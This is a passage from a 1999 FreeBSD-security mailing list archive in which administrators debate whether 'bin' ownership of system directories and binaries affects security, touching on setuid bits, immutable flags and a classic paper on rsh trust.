need to belong to the owner/group that they operate under. Doing a "chflags schg ..." will prevent them from being easily modified/hacked and likewise prevent the necessary permissions from being accidentally changed. As far as UID 'bin' not being secure, as I understand it, having the files owned by 'bin' is the same as having them owned by just about any other non-0 uid. It's the suid/sgid bits that cause potentail holes. -coranth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 18:19:46 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA21809 for freebsd-security-outgoing; Sat, 23 Jan 1999 18:19:46 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (FLEDGE.RES.CMU.EDU [128.2.93.229]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA21801 for ; Sat, 23 Jan 1999 18:19:44 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id VAA03503; Sat, 23 Jan 1999 21:18:24 -0500 (EST) Date: Sat, 23 Jan 1999 21:18:23 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: The Unicorn cc: cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership In-Reply-To: <19990123132613.A21293@unicorn.quux.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 23 Jan 1999, The Unicorn wrote: > On Sat, Jan 23, 1999 at 06:01:40AM -0500, Robert Watson wrote: > > > > You are correct--there is no security improvement through the use of the > > bin user. However, it is also the case that (aside from false assumptions > > about some improvement) security is probably not damaged by having a bin > > user. I am in the process of some research analyzing the impact of file > > and directory ownership affecting the UNIX trust model (especially w.r.t. > > setuid and setgid binaries). I will post the results when I finish up > > (probably in a month or so). Access to the bin account is very limited; > > effectively, to acquire a uid bin process capable of modifying the > > binaries, you would first have to have a uid root process that you had > > subverted. > > This is not always the case. Have a look at the old but still valid > paper from Wietse and Dan: "admin-guide-to-cracking-101" also known as > "Improving the Security of Your Site by Breaking Into it". Especially > the part on the use of rsh and the wildcard in the /etc/hosts.equiv file > (yeah, I know that allowing the r-commands is a BIG NO-NO ;-). At least on my system, none of these accounts have valid shells, so r* should block login (/nonexistent). Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 19:14:56 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA28438 for freebsd-security-outgoing; Sat, 23 Jan 1999 19:14:56 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA28427 for ; Sat, 23 Jan 1999 19:14:47 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id EAA13437 for freebsd-security@FreeBSD.ORG; Sun, 24 Jan 1999 04:14:35 +0100 (CET) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id E80631574; Sun, 24 Jan 1999 02:30:21 +0100 (CET) Date: Sun, 24 Jan 1999 02:30:21 +0100 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership Message-ID: <19990124023021.A54606@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> <36A9B2B8.701439C0@muc.de> <19990123132816.B21293@unicorn.quux.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <19990123132816.B21293@unicorn.quux.org>; from The Unicorn on Sat, Jan 23, 1999 at 01:28:16PM +0100 X-Operating-System: FreeBSD 3.0-CURRENT/ELF ctm#4994 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to The Unicorn: > Most likely 2.2.x. I'm running 2.2.8 and his claim is still valid there. Ownership of various directories and binaires was changed a few months ago in -CURRENT. I don't think it was backported to -STABLE. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #69: Mon Jan 18 02:02:12 CET 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message